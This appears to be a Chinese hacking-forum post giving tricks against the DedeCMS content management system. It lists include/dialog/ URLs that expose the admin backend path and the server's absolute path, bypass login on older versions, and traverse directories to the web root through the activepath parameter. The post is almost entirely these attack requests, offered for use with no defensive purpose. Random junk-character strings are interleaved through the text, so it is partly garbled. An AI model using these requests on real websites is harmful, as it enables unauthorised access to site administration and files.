dedecms爆后台文件技巧

admin

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

1 z0 {. t3 I+ G6 I* K# p员帐号,新版本的就直接转向了后台.

% P7 s' ~/ @& b2.include/dialog/config.php会爆出后台管理路径

3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
- j. q0 @- i9 y4 @5 m0 k& u# Q# [0 g7 P
: j7 ~0 p- H% \3 }3 b4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
! {( \4 g& @, F( E# V" u; z' e) Z
) d/ j+ I9 _: ?5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
: _. o- ]7 m! a5 K7 |3 A% f
到根目录去.不过这些版本的访问地址有些不同.
" I& }! ]$ t; x2 R1 G地址为require/dialog/select_soft.php?activepath=/././././././././

include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
5 p$ X, z+ A) e  J) p0 m% _3 Einclude\dialog\select_images.php
include\dialog\select_media.php
# h2 ~) f9 L5 Q6 J4 I( T( z& k) ~include\dialog\select_templets.php​